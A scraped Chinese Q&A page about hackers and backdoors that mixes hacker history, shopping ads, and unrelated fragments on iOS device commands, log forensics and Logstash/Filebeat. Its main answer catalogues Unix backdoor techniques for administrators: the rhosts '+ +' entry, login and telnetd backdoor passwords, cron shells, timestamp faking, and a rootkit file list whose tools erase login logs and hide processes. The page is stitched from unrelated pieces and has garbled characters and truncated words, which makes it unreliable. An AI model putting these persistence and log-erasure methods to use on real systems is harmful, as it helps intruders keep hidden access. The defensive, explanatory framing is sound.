提起黑客,总是那么神秘莫测。在人们眼中,黑客是一群聪明绝顶,精力旺盛的年轻人,一门心思地破译各种密码,以便偷偷地、未经允许地打入政府、企业或他人的计算机系统,窥视他人的隐私。那么,什么是黑客呢?
黑客(hacker),源于英语动词hack,意为“劈,砍”,引申为“干了一件非常漂亮的工作”。在早期麻省理工学院的校园俚语中,“黑客”则有“恶作剧”之意,尤指手法巧妙、技术高明的恶作剧。在日本《新黑客词典》中,对黑客的定义是“喜欢探索软件程序奥秘,并从中增长了其个人才干的人。他们不象绝大多数电脑使用者那样,只规规矩矩地了解别人指定了解的狭小部分知识。”由这些定义中,我们还看不出太贬义的意味。他们通常具有硬件和软件的高级知识,并有能力通过创新的方法剖析系统。“黑客”能使更多的网络趋于完善和安全,他们以保护网络为目的,而以不正当侵入为手段找出网络漏洞。
另一种入侵者是那些利用网络漏洞破坏网络的人。他们往往做一些重复的工作(如用暴力法破解口令),他们也具备广泛的电脑知识,但与黑客不同的是他们以破坏为目的。这些群体成为“骇客”。当然还有一种人兼于黑客与入侵者之间。
一般认为,黑客起源于50年代麻省理工学院的实验室中,他们精力充沛,热衷于解决难题。60、70年代,“黑客”一词极富褒义,用于指代那些独立思考、奉公守法的计算机迷,他们智力超群,对电脑全身心投入,从事黑客活动意味着对计算机的最大潜力进行智力上的自由探索,为电脑技术的发展做出了巨大贡献。正是这些黑客,倡导了一场个人计算机革命,倡导了现行的计算机开放式体系结构,打破了以往计算机技术只掌握在少数人手里的局面,开了个人计算机的先河,提出了“计算机为人民所用”的观点,他们是电脑发展史上的英雄。现在黑客使用的侵入计算机系统的基本技巧,例如破解口令(password cracking),开天窗(trapdoor),走后门(backdoor),安放特洛伊木马(Trojan horse)等,都是在这一时期发明的。从事黑客活动的经历,成为后来许多计算机业巨子简历上不可或缺的一部分。例如,苹果公司创始人之一乔布斯就是一个典型的例子。
在60年代,计算机的使用还远未普及,还没有多少存储重要信息的数据库,也谈不上黑客对数据的非法拷贝等问题。到了80、90年代,计算机越来越重要,大型数据库也越来越多,同时,信息越来越集中在少数人的手里。这样一场新时期的“圈地运动”引起了黑客们的极大反感。黑客认为,信息应共享而不应被少数人所垄断,于是将注意力转移到涉及各种机密的信息数据库上。而这时,电脑化空间已私有化,成为个人拥有的财产,社会不能再对黑客行为放任不管,而必须采取行动,利用法律等手段来进行控制。黑客活动受到了空前的打击。
但是,政府和公司的管理者现在越来越多地要求黑客传授给他们有关电脑安全的知识。许多公司和政府机构已经邀请黑客为他们检验系统的安全性,甚至还请他们设计新的保安规程。在两名黑客连续发现网景公司设计的xyk购物程序的缺陷并向商界发出公告之后,网景修正了缺陷并宣布举办名为“网景缺陷大奖赛”的竞赛,那些发现和找到该公司产品中安全漏洞的黑客可获1000美元奖金。无疑黑客正在对电脑防护技术的发展作出贡献。
谈到网络安全问题,就没法不谈黑客(Hacker)。翻开1998年日本出版的《新黑客字典》,可以看到上面对黑客的定义是:"喜欢探索软件程序奥秘、并从中增长其个人才干的人。他们不像绝大多数电脑使用者,只规规矩矩地了解别人指定了解的范围狭小的部分知识。"
"黑客"大都是程序员,他们对于 *** 作系统和编程语言有着深刻的认识,乐于探索 *** 作系统的奥秘且善于通过探索了解系统中的漏洞及其原因所在,他们恪守这样一条准则:"Never damage any system"(永不破坏任何系统)。他们近乎疯狂地钻研更深入的电脑系统知识并乐于与他人共享成果,他们一度是电脑发展史上的英雄,为推动计算机的发展起了重要的作用。那时候,从事黑客活动,就意味着对计算机的潜力进行智力上最大程度的发掘。国际上的著名黑客均强烈支持信息共享论,认为信息、技术和知识都应当被所有人共享,而不能为少数人所垄断。大多数黑客中都具有反社会或反传统的色彩,同时,另外一个特征是十分重视团队的合作精神。
显然,"黑客"一词原来并没有丝毫的贬义成分。直到后来,少数怀着不良的企图,利用非法手段获得的系统访问权去闯入远程机器系统、破坏重要数据,或为了自己的私利而制造麻烦的具有恶意行为特征的人(他们其实是"Crack")慢慢玷污了"黑客"的名声,"黑客"才逐渐演变成入侵者、破坏者的代名词。
"他们瞄准一台计算机,对它进行控制,然后毁坏它。"--这是1995年美国拍摄第一部有关黑客的**《战争游戏》中,对"黑客"概念的描述。
虽然现在对黑客的准确定义仍有不同的意见,但是,从信息安全这个角度来说,"黑客"的普遍含意是特指对电脑系统的非法侵入者。多数黑客都痴迷电脑,认为自己在计算机方面的天赋过人,只要自己愿意,就可毫无顾忌地非法闯入某些敏感的信息禁区或者重要网站,以窃取重要的信息资源、篡改网址信息或者删除该网址的全部内容等恶作剧行为作为一种智力的挑战而自我陶醉。
目前黑客已成为一个特殊的社会群体,在欧美等国有不少完全合法的黑客组织,黑客们经常召开黑客技术交流会,97年11月,在纽约就召开了世界黑客大会,与会者达四五千人之众。另一方面,黑客组织在因特网上利用自己的网站上介绍黑客攻击手段、免费提供各种黑客工具软件、出版网上黑客杂志。这使得普通人也很容易下载并学会使用一些简单的黑客手段或工具对网络进行某种程度的攻击,进一步恶化了网络安全环境。
回答于 2014-05-16
抢首赞
除甲醛产品十大排名-京东家电排行榜,赶快了解一下!
3M 甲醛去除剂除甲醛净化空气净化剂清新剂可替竹炭活性碳包除异味 PN38008粉色-2个
¥188 元
3M 甲醛去除剂除甲醛净化空气净化剂清新剂可替竹炭活性碳包除异味 PN38006金色-2个
¥188 元
3M 甲醛去除剂除甲醛净化空气净化剂清新剂可替竹炭活性碳包除异味 PN38006金色-1个
¥98 元
京东广告
红曲胶囊正品旗舰店,潮流新品,好货热卖,更多优惠尽在淘宝!
三生御坊堂奔马牌红曲胶囊120粒
¥476 元
宁波直销三生御坊堂奔马牌红曲胶囊120粒22年1月出厂
¥476 元
直邮 Solgar Red Yeast Rice 红曲米胶囊心血管保健 600mg 120粒
¥300 元
正品压乐鑫康牌胶囊稳压心脑通红曲米中老年延平胶囊买3送2,5送4
¥218 元
日本进口高含量纳豆激酶4000FU胶囊中老年健康野口正品非美国红曲
¥499 元
simbataobaocom广告
红曲纳豆激酶胶囊-上淘宝选好物,轻松下单,放心购物!
红曲纳豆激酶胶囊-淘宝热卖好物,大牌汇聚,畅享购物!热卖优质商品,淘你满意!
广告
黑客中说的后门什么意思
一般黑客都会在攻入系统后不只一次地进入该系统。为了下次再进入系统时方便一点,黑客会留下一个后门,特洛伊木马就是后门的最好范例。Unix中留后门的方法有很多种,下面介绍几种常见的后门,供网络管理员参考防范。密码破解后门这是入侵者使用的最早也是最老的方法,它不仅可以获得对Unix机器的访问,而且可 以通过破解密码制造后门。这就是破解口令薄弱的帐号。以后即使管理员封了入侵者的当前帐号,这些新的帐号仍然可能是重新侵入的后门。多数情况下,入侵者寻找口令薄弱的未使用帐号,然后将口令改的难些。当管理员寻找口令薄弱的帐号是,也不会发现这些密码已修改的帐号。因而管理员很难确定查封哪个帐号。Rhosts + + 后门在连网的Unix机器中,象Rsh和Rlogin这样的服务是基于rhosts文件里的主机名使用简 单的认证方法。用户可以轻易的改变设置而不需口令就能进入。入侵者只要向可以访问的某用户的rhosts文件中输入"+ +",就可以允许任何人从任何地方无须口令便能进入这个帐号。特别当home目录通过NFS向外共享时,入侵者更热中于此。这些帐号也成 了入侵者再次侵入的后门。许多人更喜欢使用Rsh,因为它通常缺少日志能力。许多管理员经常检查 "+ +",所以入侵者实际上多设置来自网上的另一个帐号的主机名和用户名,从而不易被发现。 校验和及时间戳后门早期,许多入侵者用自己的trojan程序替代二进制文件。系统管理员便依靠时间戳和系 统校验和的程序辨别一个二进制文件是否已被改变,如Unix里的sum程序。入侵者又发展了使trojan文件和原文件时间戳同步的新技术。它是这样实现的: 先将系统时钟拨回到原文件时间,然后调整trojan文件的时间为系统时间。一旦二进制trojan文件与 原来的精确同步,就可以把系统时间设回当前时间。Sum程序是基于CRC校验,很容易骗过。入侵者设计出了可以将trojan的校验和调整到原文件的校验和的程序。MD5是被 大多数人推荐的,MD5使用的算法目前还没人能骗过。Login后门在Unix里,login程序通常用来对telnet来的用户进行口令验证。 入侵者获取loginc的原代码并修改,使它在比较输入口令与存储口令时先检查后门口令。如果用户敲入后门 口令,它将忽视管理员设置的口令让你长驱直入。这将允许入侵者进入任何帐号,甚至是root。由于后门口令是在用户真实登录并被日志记录到utmp和wtmp前产生一个访问 的,所以入侵者可以登录获取shell却不会暴露该帐号。管理员注意到这种后门后,便用"strings"命令搜索login程序以寻找文本信息。 许多情况下后门口令会原形毕露。入侵者就开始加密或者更好的隐藏口令,使strings命令失效。 所以更多的管理员是用MD5校验和检测这种后门的。 Telnetd后门当用户telnet到系统,监听端口的inetd服务接受连接随后递给intelnetd,由它运行 login一些入侵者知道管理员会检查login是否被修改,就着手修改intelnetd 在intelnetd内部有一些对用户信息的检验,比如用户使用了何种终端。典型的终端 设置是Xterm或者VT100入侵者可以做这样的后门,当终端设置为"letmein"时产生一个不要任何验证的shell 入侵者已对某些服务作了后门,对来自特定源端口的连接产生一个shell。 服务后门几乎所有网络服务曾被入侵者作过后门。 Finger,rsh,rexec,rlogin,ftp,甚至 inetd等等的作了的版本随处多是。有的只是连接到某个TCP端口的shell,通过后门口令就能获取访问。这些程序有时用刺娲□?Ucp这样不用的服务,或者被加入inetdconf 作为一个新的服务,管理员应该非常注意那些服务正在运行,并用MD5对原服务程序做校验。Cronjob后门 Unix上的Cronjob可以按时间表调度特定程序的运行。入侵者可以加入后门shell程序使它在1AM到2AM之间运行,那么每晚有一个小时可以获得访问。也可以查看cronjob中 经常运行的合法程序,同时置入后门。库后门 几乎所有的UNIX系统使用共享库,共享库用于相同函数的重用而减少代码长度。一些入侵者在象cryptc和_cryptc这些函数里作了后门;象loginc这样的程序调用了 crypt()。当使用后门口令时产生一个shell。因此,即使管理员用MD5检查login程序,仍然能产生一个后门函数,而且许多管理员并不会检查库是否被做了后门。对于许多入侵者来说有一个问题: 一些管理员对所有东西多作了MD5校验,有一种办法是入侵者对open()和文件访问函数做后门。后门函数读原文件但执行trojan后门程序。所以当MD5读这些文件时,校验和一切正常,但当系统运行时将执行trojan版本的,即使trojan库本身也可躲过MD5校验,对于管理员来说有一种方法可以找到后门,就是静态编连MD5校验程序然后运行,静态连接程序不会使用trojan共享库。 内核后门内核是Unix工作的核心,用于库躲过MD5校验的方法同样适用于内核级别,甚至连静态 连接多不能识别。一个后门作的很好的内核是最难被管理员查找的,所幸的是内核的 后门程序还不是随手可得,每人知道它事实上传播有多广。文件系统后门 入侵者需要在服务器上存储他们的掠夺品或数据,并不能被管理员发现,入侵者的文章常是包括exploit脚本工具,后门集,sniffer日志,email的备分,原代码,等等!有时为了防止管理员发现这么大的文件,入侵者需要修补"ls","du","fsck"以隐匿特定的目录和文件,在很低的级别,入侵者做这样的漏洞: 以专有的格式在硬盘上割出一部分,且表示为坏的扇区。因此入侵者只能用特别的工具访问这些隐藏的文件,对于普通的管理员来说,很难发现这些"坏扇区"里的文件系统,而它又确实存在。Boot块后门 在PC世界里,许多病毒藏匿与根区,而杀病毒软件就是检查根区是否被改变。Unix下,多数管理员没有检查根区的软件,所以一些入侵者将一些后门留在根区。隐匿进程后门 入侵者通常想隐匿他们运行的程序,这样的程序一般是口令破解程序和监听程序(sniffer),有许多办法可以实现,这里是较通用的: 编写程序时修改自己的argv[] 使它看起来象其他进程名。可以将sniffer程序改名类似insyslog再执行,因此当管理员用"ps"检查运行进程时,出现 的是标准服务名。可以修改库函数致使"ps"不能显示所有进程,可以将一个后门或程序嵌入中断驱动程序使它不会在进程表显现。使用这个技术的一个后门例子是 amodtargz : 网络通行。这些网络通行后 门有时允许入侵者通过防火墙进行访问。有许多网络后门程序允许入侵者建立某个端口号并不用通过普通服务就能实现访问。 因为这是通过非标准网络端口的通行,管理员可能忽视入侵者的足迹。 这种后门通常使用TCP,UDP和ICMP,但也可能是其他类型报文。TCP Shell 后门入侵者可能在防火墙没有阻塞的高位TCP端口建立这些TCP Shell后门 许多情况下,他们用口令进行保护以免管理员连接上后立即看到是shell访问。 管理员可以用netstat 命令查看当前的连接状态,那些端口在侦听,目前连接的来龙去脉。 通常这些后门可以让入侵者躲过TCP Wrapper技术。这些后门可以放在SMTP端口,许多防火墙允许 e-mail通行的 UDP Shell 后门管理员经常注意TCP连接并观察其怪异情况,而UDP Shell后门没有这样的连接,所以 netstat不能显示入侵者的访问痕迹,许多防火墙设置成允许类似DNS的UDP报文的通行,通常入侵者将UDP Shell放置在这个端口,允许穿越防火墙。ICMP Shell 后门Ping是通过发送和接受ICMP包检测机器活动状态的通用办法之一。许多防火墙允许外界ping它内部的机器,入侵者可以放数据入Ping的ICMP包,在ping的机器间形成一个shell通道,管理员也许会注意到Ping包暴风,但除了他查看包内数据,否者入侵者不会暴露。 加密连接管理员可能建立一个sniffer试图某个访问的数据,但当入侵者给网络通行后门加密 后,就不可能被判定两台机器间的传输内容了。
天珠缘启阿灵
7点赞3890浏览
更多专家
黑客、天窗、后门三者具体定义是什么?
专家1对1在线解答问题
5分钟内响应 | 万名专业答主
马上提问
最美的花火 咨询一个电子数码问题,并发表了好评
lanqiuwangzi 咨询一个电子数码问题,并发表了好评
garlic 咨询一个电子数码问题,并发表了好评
1888493 咨询一个电子数码问题,并发表了好评
篮球大图 咨询一个电子数码问题,并发表了好评
动物乐园 咨询一个电子数码问题,并发表了好评
AKA 咨询一个电子数码问题,并发表了好评
黑客后门是什么意思
视频回答
凌情伤
747浏览
华为云 HECS云服务器 云主机租用网站虚拟服务器云桌面游戏开发APP云电脑 1核 2G 1M(3个月)
¥2418 元¥30000 元
购买
京东广告
产后收腹带剖腹产术后专用刨抛妇产剖宫产大码200斤医用束缚夏季
¥256 元¥256 元
购买
simbataobaocom广告
全部
2
一个与Apple iOS设备进行本地通信的库。
libimobiledevice是一个跨平台的软件库,用于支持iPhone、iPod Touch、iPad和Apple TV设备的协议。它不依赖于使用任何现有的专有库,不需要越狱。它允许其他软件轻松访问设备的文件系统,检索有关设备及其内部设备的信息,备份/恢复设备,管理跳板图标,管理已安装的应用程序,检索地址簿/日历/笔记和书签,以及(使用LIGBGOD)同步音乐和视频到设备。
官方网站: >
对于8257的机器,尤其是蓝牙问题,主要靠ATClog来分析蓝牙除音频以外的几乎所问题;而蓝牙音频相关,除了需要ATCLog之外,还需要dump音频数据;这里就介绍一下这两种log的抓取方法
如果车机通过USB连接了电脑,那么可以通过adb命令来打开
如果车机没有连接,则需要进入工厂模式,在工厂模式中找到日志工具,点开即可
打开设置按钮,一般设置开关,打开MobileLog和ConnsysLog,关闭ModemLog和NetworkLog
然后,点击ConnsysLog
在这个界面,勾选Stack Log,同时,BT Firmware Log Level设置为Debug
日志的概念为了维护自身系统资源的运行状况,计算机系统一般都会有相应的日志记录系统有关日常事件或者误 *** 作警报的日期及时间戳信息。这些日志信息对计算机犯罪调查人员非常有用。所谓日志(Log)是指系统所指定对象的某些 *** 作和其 *** 作结果按时间有序的集合。每个日志文件由日志记录组成,每条日志记录描述了一次单独的系统事件。通常情况下,系统日志是用户可以直接阅读的文本文件,其中包含了一个时间戳和一个信息或者子系统所特有的其他信息。日志文件为服务器、工作站、防火墙和应用软件等IT资源相关活动记录必要的、有价值的信息,这对系统监控、查询、报表和安全审计是十分重要的。日志文件中的记录可提供以下用途:监控系统资源;审计用户行为;对可疑行为进行告警;确定入侵行为的范围;为恢复系统提供帮助;生成调查报告;为打击计算机犯罪提供证据来源。日志的特点日志记录着系统中特定事件的相关活动信息,从计算机取证角度看,日志主要有以下特点:(1)不易读懂虽然大部分系统的日志都以文本的形式记录,但由于各系统日志格式不一致,不熟悉各类日志格式就很难获取有用的信息。同时有相当部分应用系统并不采用文本格式记录着日志信息,必须借助专用的工具分析这些日志,否则很难读懂其中的日志信息。(2)数据量大通常对外服务产生的日志文件如Web服务日志、防火墙、入侵检测系统日志和数据库日志以及各类服务器日志等都很大,一个日志文件一天产生的容量少则几十兆、几百兆,多则有几个G,几十个G,这使得获取和分析日志信息变得很困难。(3)不易获取由于网络中不同的 *** 作系统、应用软件、网络设备和服务产生不同的日志文件,即使相同的服务如IIS也可采用不同格式的日志文件记录日志信息。目前国际上还没有形成标准的日志格式,各系统开发商和网络设备生产商往往根据各自的需要制定自己的日志格式,使得不同系统的日志格式和存储方式有所差别。如何获取各类不同系统产生的不同日志文件作为打击计算机犯罪者的电子证据变得尤为困难。(4)不同日志之间存在某种必然的联系一个系统的日志是对本系统涉及的运行状况的信息按时间顺序作一简单的记录,仅反映本系统的某些特定事件的 *** 作情况,并不完全反映某一用户的整个活动情况。一个用户在网络活动的过程中会在很多的系统日志中留下痕迹,如防火墙IDS日志、 *** 作系统日志等,这些不同的日志之间存在某种必然的联系来反映用户的活动情况。只有将多个系统的日志结合起来分析,才能准确反映用户活动情况。(5)容易被修改、破坏甚至伪造产生系统日志的软件通常为应用系统而不是作为 *** 作系统的子系统运行,所产生的日志记录容易遭到恶意的破坏或修改。系统日志通常存储在系统未经保护的目录中,并以文本方式存储,未经加密和校验处理,没有提供防止恶意篡改的有效保护机制。因此,日志文件并不一定是可靠的,入侵者可能会篡改日志文件,从而不能被视为有效的证据。由于日志是直接反映入侵者痕迹的,在计算机取证中扮演着重要的角色,入侵者获取系统权限窃取机密信息或破坏重要数据后往往会修改或删除与其相关的日志信息,甚至根据系统的漏洞伪造日志以迷惑系统管理员和审计。 Unix系统日志在Unix下,最常用的存放日志文件的目录是: /usr/adm 早期版本的 Unix /var/adm 较新版本的 Unix /var/log 用于Solaris,Linux,BSD等 /etc Unix system V早期版本 在这些目录下,或其子目录下,你可以找到以下日志文件(也许是其中的一部分): lastlog 记录用户最后一次成功登录时间 loginlog 不良的登陆尝试记录 messages 记录输出到系统主控台以及由syslog系统服务程序产生的消息 utmp 记录当前登录的每个用户 utmpx 扩展的utmp wtmp 记录每一次用户登录和注销的历史信息 wtmpx 扩展的wtmp voldlog 记录使用外部介质出现的错误 xferkig 记录Ftp的存取情况 sulog 记录su命令的使用情况 acct 记录每个用户使用过的命令 aculog 拨出自动呼叫记录 记录输出到系统主控台以及由syslog系统服务程序产生的消息。syslog采用可配置的、统一的系统登记程序,随时从系统各处接受log请求,然后根据/etc/syslogconf中的预先设定把log信息写入相应文件中、邮寄给特定用户或者直接以消息的方式发往控制台。值得注意的是,为了防止入侵者修改、删除messages里的记录信息,可以采用用打印机记录或跨越网络登记的方式来挫败入侵者的企图。任何程序都可以通过syslog记录事件。Syslog可以记录系统事件,可以写到一个文件或设备中,或给用户发送一个信息。它能记录本地事件或通过网络记录到另一台主机上的事件。 Syslog依据两个重要的文件:/sbin/syslogd(守护进程)和/etc/syslogconf配置文件。习惯上,多数syslog信息被写到/var/adm或/ar/log目录下的信息文件中(message)。一个典型的syslog记录包括生成程序的名字和一个文本信息,它还包括一个设备和一个行为级别(但不在日志中出现)。 Windows系统日志以Windows2000/XP为例,日志文件通常有应用程序日志,安全日志、系统日志、DNS服务器日志、FTP日志、>
1、打印app列表
ideviceinstaller -l
2、查看当前已连接的设备的UUID
idevice_id -l
3、获取设备信息
ideviceinfo
4、获取设备时间
idevicedate
5、重启设备
idevicediagnostics restart
6、安装ipa包,卸载应用
ideviceinstaller -i xxxipa //命令安装一个ipa文件到手机上,如果是企业签名的,非越狱机器也可以直接安装了。
ideviceinstaller -U [bundleID] //命令卸载应用,需要知道此应用的bundleID
7、查看系统日志
idevicesyslog //屏幕上即可看见手机上所有的日志
idevicesyslog >> iphonelog &
//该命令是将日志导入到iphonelog这个文件,并且是在后台执行。
//然后用tail -f和grep查看log
tail -f iphonelog
tail -f iphonelog | grep 'WeChat’ # 查看包含WeChat的行
8、截图
idevicescreenshot
//如果在使用截图的时候出现报错信息,那么就去把相应版本的DeveloperDiskImage的两个文件复制到libimobiledevice文件下面。
路径:
/Applications/Xcodeapp/Contents/Developer/Platforms/iPhoneOSplatform/DeviceSupport/对应版本/
获取版本号命令:
ideviceinfo -k ProductVersion
安装DeveloperDiskImage命令:
ideviceimagemounter DeveloperDiskImagedmg
//然后就可以正常截图了
优势
Logstash 主要的有点就是它的灵活性,这还主要因为它有很多插件。然后它清楚的文档已经直白的配置格式让它可以再多种场景下应用。这样的良性循环让我们可以在网上找到很多资源,几乎可以处理任何问题。以下是一些例子:
5 minute intro
reindexing data in Elasticsearch
parsing Elasticsearch logs
rewriting Elasticsearch slowlogs so you can replay them with JMeter
劣势
Logstash 致命的问题是它的性能以及资源消耗(默认的堆大小是 1GB)。尽管它的性能在近几年已经有很大提升,与它的替代者们相比还是要慢很多的。这里有 Logstash 与 rsyslog 性能对比 以及 Logstash 与 filebeat 的性能对比 。它在大数据量的情况下会是个问题。
优势
Filebeat 只是一个二进制文件没有任何依赖。它占用资源极少,尽管它还十分年轻,正式因为它简单,所以几乎没有什么可以出错的地方,所以它的可靠性还是很高的。它也为我们提供了很多可以调节的点,例如:它以何种方式搜索新的文件,以及当文件有一段时间没有发生变化时,何时选择关闭文件句柄。
劣势
Filebeat 的应用范围十分有限,所以在某些场景下我们会碰到问题。例如,如果使用 Logstash 作为下游管道,我们同样会遇到性能问题。正因为如此,Filebeat 的范围在扩大。开始时,它只能将日志发送到 Logstash 和 Elasticsearch,而现在它可以将日志发送给 Kafka 和 Redis,在 5x 版本中,它还具备过滤的能力。
典型应用场景
Filebeat 在解决某些特定的问题时:日志存于文件,我们希望
将日志直接传输存储到 Elasticsearch 。这仅在我们只是抓去(grep)它们或者日志是存于 JSON 格式(Filebeat 可以解析 JSON)。或者如果打算使用 Elasticsearch 的 Ingest 功能对日志进行解析和丰富。
将日志发送到 Kafka/Redis 。所以另外一个传输工具(例如,Logstash 或自定义的 Kafka 消费者)可以进一步丰富和转发。这里假设选择的下游传输工具能够满足我们对功能和性能的要求
优势
可以获取 /var/log 下的所有信息,解析各种格式(Elasticsearch,Solr,MongoDB,Apache >
分类: 电脑/网络 >> 反病毒
解析:
当一个训练有素的程序员设计一个功能较复杂的软件时,都习惯于先将整个软件分割为若干模块,然后再对各模块单独设计、调试,而后门则是一个模块的秘密入口。在程序开发期间,后门的存在是为了便于测试、更改和增强模块的功能。当然,程序员一般不会把后门记入软件的说明文档,因此用户通常无法了解后门的存在。
/按照正常 *** 作程序,在软件交付用户之前,程序员应该去掉软件模块中的后门,但是,由于程序员的疏忽,或者故意将其留在程序中以便日后可以对此程序进行隐蔽的访问,方便测试或维护已完成的程序等种种原因,实际上并未去掉。
这样,后门就可能被程序的作者所秘密使用,也可能被少数别有用心的人用穷举搜索法发现利用。
cachebaidu/cword=%CA%B2%C3%B4%3B%CA%C7%3B%BA%F3%C3%C5&url=%3A%2Exiaom%2E/Article%5Fshow%2Easp%3FArticleID%3D4777&b=0&a=29&user=baidu
什么是后门
从早期的计算机入侵者开始,他们就努力发展能使自己重返被入侵系统的技术或后门本文将讨论许多常见的后门及其检测方法 更多的焦点放在Unix系统的后门,同时讨论一些未来将会出现的Windows NT的后门 本文将描述如何测定入侵者使用的方法这样的复杂内容和管理员如何防止入侵者重返的基础知识 当管理员懂的一旦入侵者入侵后要制止他们是何等之难以后, 将更主动于预防第一次入侵 本文试图涉及大量流行的初级和高级入侵者制作后门的手法, 但不会也不可能覆盖到所有可能的方法
大多数入侵者的后门实现以下二到三个目的:
即使管理员通过改变所有密码类似的方法来提高安全性,仍然能再次侵入 使再次侵入被发现的可能性减至最低大多数后门设法躲过日志, 大多数情况下即使入侵者正在使用系统也无法显示他已在线 一些情况下, 如果入侵者认为管理员可能会检测到已经安装的后门, 他们以系统的 脆弱性作为唯一的后门, 重而反复攻破机器 这也不会引起管理员的注意 所以在 这样的情况下,一台机器的脆弱性是它唯一未被注意的后门
密码破解后门
这是入侵者使用的最早也是最老的方法, 它不仅可以获得对Unix机器的访问, 而且可以通过破解密码制造后门 这就是破解口令薄弱的帐号 以后即使管理员封了入侵者的当前帐号,这些新的帐号仍然可能是重新侵入的后门 多数情况下, 入侵者寻找口令薄弱的未使用帐号,然后将口令改的难些 当管理员寻找口令薄弱的帐号是, 也不会发现这些密码已修改的帐号因而管理员很难确定查封哪个帐号
Rhosts + + 后门
在连网的Unix机器中,象Rsh和Rlogin这样的服务是基于rhosts文件里的主机名使用简单的认证方法 用户可以轻易的改变设置而不需口令就能进入 入侵者只要向可以访问的某用户的rhosts文件中输入"+ +", 就可以允许任何人从任何地方无须口令便能进入这个帐号 特别当home目录通过NFS向外共享时, 入侵者更热中于此 这些帐号也成了入侵者再次侵入的后门 许多人更喜欢使用Rsh, 因为它通常缺少日志能力 许多管
理员经常检查 "+ +", 所以入侵者实际上多设置来自网上的另一个帐号的主机名和用户名,从而不易被发现
校验和及时间戳后门
早期,许多入侵者用自己的trojan程序替代二进制文件 系统管理员便依时间戳和系统校验和的程序辨别一个二进制文件是否已被改变, 如Unix里的sum程序 入侵者又发展了使trojan文件和原文件时间戳同步的新技术 它是这样实现的: 先将系统时钟拨回到原文件时间, 然后调整trojan文件的时间为系统时间 一旦二进制trojan文件与原来的精确同步, 就可以把系统时间设回当前时间 sum程序是基于CRC校验, 很容易
骗过入侵者设计出了可以将trojan的校验和调整到原文件的校验和的程序 MD5是被大多数人推荐的,MD5使用的算法目前还没人能骗过
Login后门
在Unix里,login程序通常用来对tel来的用户进行口令验证 入侵者获取loginc的原代码并修改,使它在比较输入口令与存储口令时先检查后门口令 如果用户敲入后门口令,它将忽视管理员设置的口令让你长驱直入 这将允许入侵者进入任何帐号,甚至是root由于后门口令是在用户真实登录并被日志记录到utmp和wtmp前产生一个访问的, 所以入侵者可以登录获取shell却不会暴露该帐号 管理员注意到这种后门后, 便
用"strings"命令搜索login程序以寻找文本信息 许多情况下后门口令会原形毕露入侵者就开始加密或者更好的隐藏口令, 使strings命令失效 所以更多的管理员是用MD5校验和检测这种后门的
Teld后门
当用户tel到系统, 监听端口的id服务接受连接随后递给inteld,由它运行login一些入侵者知道管理员会检查login是否被修改, 就着手修改inteld在inteld内部有一些对用户信息的检验, 比如用户使用了何种终端 典型的终端设置是Xterm或者VT100入侵者可以做这样的后门, 当终端设置为"letmein"时产生一个不要任何验证的shell 入侵者已对某些服务作了后门, 对来自特定源端口的连接产
生一个shell
服务后门
几乎所有网络服务曾被入侵者作过后门 finger, rsh, rexec, rlogin, ftp, 甚至id等等的作了的版本随处多是 有的只是连接到某个TCP端口的shell,通过后门口令就能获取访问这些程序有时用刺娲□?ucp这样不用的服务,或者被加入idconf作为一个新的服务管理员应该非常注意那些服务正在运行, 并用MD5对原服务程序做校验
Cronjob后门
Unix上的Cronjob可以按时间表调度特定程序的运行 入侵者可以加入后门shell程序使它在1AM到2AM之间运行,那么每晚有一个小时可以获得访问 也可以查看cronjob中经常运行的合法程序,同时置入后门
库后门
几乎所有的UNIX系统使用共享库 共享库用于相同函数的重用而减少代码长度 一些入侵者在象cryptc和_cryptc这些函数里作了后门 象loginc这样的程序调用了crypt(),当使用后门口令时产生一个shell 因此, 即使管理员用MD5检查login程序,仍然能产生一个后门函数而且许多管理员并不会检查库是否被做了后门对于许多入侵者来说有一个问题: 一些管理员对所有东西多作了MD5校验 有一种办法是入侵者对open()和文件访问函数做后门 后门函数读原文件但执行trojan后门程序 所以 当MD5读这些文件时,校验和一切正常 但当系统运行时将执行trojan版本的 即使trojan库本身也可躲过MD5校验 对于管理员来说有一种方法可以找到后门, 就是静态编连MD5校验程序然后运行静态连接程序不会使用trojan共享库
内核后门
内核是Unix工作的核心 用于库躲过MD5校验的方法同样适用于内核级别,甚至连静态连接多不能识别 一个后门作的很好的内核是最难被管理员查找的, 所幸的是内核的后门程序还不是随手可得, 每人知道它事实上传播有多广
文件系统后门
入侵者需要在服务器上存储他们的掠夺品或数据,并不能被管理员发现 入侵者的文章常是包括exploit脚本工具,后门集,sniffer日志,email的备分,原代码,等等 有时为了防止管理员发现这么大的文件, 入侵者需要修补"ls","du","fsck"以隐匿特定的目录和文件在很低的级别, 入侵者做这样的漏洞: 以专有的格式在硬盘上割出一部分,且表示为坏的扇区 因此入侵者只能用特别的工具访问这些隐藏的文件 对于普通的
管理员来说, 很难发现这些"坏扇区"里的文件系统, 而它又确实存在
Boot块后门
在PC世界里,许多病毒藏匿与根区, 而杀病毒软件就是检查根区是否被改变 Unix下,多数管理员没有检查根区的软件, 所以一些入侵者将一些后门留在根区
隐匿进程后门
入侵者通常想隐匿他们运行的程序 这样的程序一般是口令破解程序和监听程序 (sniffer)有许多办法可以实现,这里是较通用的: 编写程序时修改自己的argv[]使它看起来象其他进程名 可以将sniffer程序改名类似insyslog再执行 因此当管理员用"ps"检查运行进程时, 出现 的是标准服务名 可以修改库函数致使
"ps"不能显示所有进程 可以将一个后门或程序嵌入中断驱动程序使它不会在进程表显现 使用这个技术的一个后门例子是amodtargz :
starniimmspbsu/~maillist/bugtraq1/0777
也可以修改内核隐匿进程
Rootkit
最流行的后门安装包之一是rootkit 它很容易用web搜索器找到从Rootkit的README里,可以找到一些典型的文件:
z2 - removes entries from utmp, wtmp, and lastlog
Es - rokstar's ether sniffer for sun4 based kernels
Fix - try to fake checksums, install with same dates/perms/u/g
Sl - bee root via a magic password sent to login
Ic - modified ifconfig to remove PROMISC flag from output
ps: - hides the processes
Ns - modified stat to hide connections to certain machines
Ls - hides certain directories and files from being listed
du5 - hides how much space is being used on your hard drive
ls5 - hides certain files and directories from being listed
网络通行后门
入侵者不仅想隐匿在系统里的痕迹, 而且也要隐匿他们的网络通行 这些网络通行后门有时允许入侵者通过防火墙进行访问 有许多网络后门程序允许入侵者建立某个端口号并不用通过普通服务就能实现访问 因为这是通过非标准网络端口的通行, 管理员可能忽视入侵者的足迹 这种后门通常使用TCP,UDP和ICMP, 但也可能是其他类型报文
TCP Shell 后门
